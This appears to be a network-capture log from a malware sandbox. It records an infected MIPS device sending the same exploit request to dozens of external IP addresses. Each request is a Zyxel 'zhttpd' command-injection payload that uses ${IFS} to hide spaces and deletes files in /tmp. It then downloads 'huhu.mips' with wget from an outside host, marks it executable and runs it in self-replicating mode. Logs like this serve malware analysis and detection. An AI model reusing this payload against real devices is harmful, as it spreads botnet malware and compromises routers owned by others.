                                      Jan 19, 2024 17:28:38.243002892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      147192.168.2.143964294.152.218.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.243056059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      148192.168.2.144406276.23.58.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.243160009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      149192.168.2.1433370110.185.206.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.243247986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      150192.168.2.1450464108.53.128.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.243275881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      151192.168.2.143797265.122.163.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.243347883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      152192.168.2.144982876.10.175.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.243401051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      153192.168.2.1445882151.23.130.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.243470907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      154192.168.2.1435692118.223.210.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.243526936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      155192.168.2.1445174192.248.149.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.243612051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      156192.168.2.145156060.4.221.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.243674040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      157192.168.2.1456590101.206.38.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.243731976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      158192.168.2.1436614105.187.199.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.243776083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      159192.168.2.143695817.254.19.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.243805885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      160192.168.2.144024651.200.183.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.243875980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      161192.168.2.143344084.175.59.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.243942976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      162192.168.2.1445614154.85.111.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.244023085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      163192.168.2.1436598202.15.105.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.244065046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      164192.168.2.1438902203.253.110.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.244163036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      165192.168.2.1447962165.79.12.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.244195938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      166192.168.2.1441966182.142.226.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.244255066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      167192.168.2.144154478.218.175.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.244333029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      168192.168.2.1450882177.192.165.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.244432926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      169192.168.2.1444852169.196.253.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.244491100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      170192.168.2.143674883.162.90.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.244535923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      171192.168.2.1440228206.153.108.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:39.251456022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      172192.168.2.143643290.69.107.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:39.251518011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      173192.168.2.145674850.12.216.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:39.251524925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      174192.168.2.145071266.196.165.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:39.251543045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      175192.168.2.144308496.18.201.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:39.251574039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      176192.168.2.1439636184.113.86.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:39.251620054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      177192.168.2.1449222191.242.112.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:39.251657963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      178192.168.2.1444660105.149.203.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:39.251662970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      179192.168.2.1441266101.244.66.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:39.251703978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      180192.168.2.1458518123.121.41.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:41.273463011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      181192.168.2.145318042.225.77.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:42.278398991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      182192.168.2.1458360160.156.152.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:42.278436899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      183192.168.2.1451436138.97.238.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:42.278485060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      184192.168.2.1453574119.56.204.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:42.278520107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      185192.168.2.143545294.213.102.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:42.278548956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      186192.168.2.1437618104.104.113.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:42.278619051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      187192.168.2.1441868201.154.133.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:42.278656006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      188192.168.2.1448132209.193.229.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:42.278714895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      189192.168.2.1449084155.95.114.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:42.278733015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      190192.168.2.1442756101.215.243.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:42.278768063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      191192.168.2.1443830185.12.191.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:42.278836012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      192192.168.2.1437274165.234.72.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:42.278872967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      193192.168.2.143320240.182.49.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:42.278934956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      194192.168.2.1450304117.155.131.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:42.278979063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      195192.168.2.1432906160.34.225.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:42.279266119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      196192.168.2.1432768104.52.125.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:43.283723116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      197192.168.2.143773088.238.239.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:44.288269997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      198192.168.2.1438776106.223.102.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:44.288304090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      199192.168.2.145058850.54.39.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:44.288331985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      200192.168.2.1451254172.109.51.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:44.288386106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      201192.168.2.144503437.254.209.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:44.288429976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      202192.168.2.144880048.181.212.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:44.288479090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      203192.168.2.1449766149.156.113.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:44.288636923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      204192.168.2.145270477.142.240.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:44.288700104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      205192.168.2.1449204126.16.51.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:44.288723946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      206192.168.2.144821897.12.253.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:44.288774014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      207192.168.2.1453042148.80.99.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:45.292009115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      208192.168.2.1458014211.219.25.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:47.297385931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      209192.168.2.1453532138.224.181.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:47.297449112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      210192.168.2.1442016106.165.59.218443
                                      TimestampBytes transferredDirectionData
